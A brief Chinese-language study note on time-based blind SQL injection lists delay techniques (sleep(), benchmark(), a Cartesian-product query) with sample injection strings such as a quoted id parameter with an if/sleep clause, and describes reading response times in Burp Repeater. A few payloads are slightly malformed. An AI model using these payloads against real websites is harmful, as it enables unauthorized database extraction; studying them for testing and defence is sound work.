时间盲注

1.常用函数

（1）sleep（）

1

?id=1' and if(1,sleep(),0) --+

如果1为真，则延时3秒，否则无延时 （2）benchmark（）

1

benchmark(1000000,sha(1))

对sha这个操作超级多次 （3）笛卡尔积

1

select if(1=1,(SELECT count(*) FROM information_schema,columns B),0)

2.主要思路

bp抓包，放repeter里面response 看response右下角的时间，利用延时判真假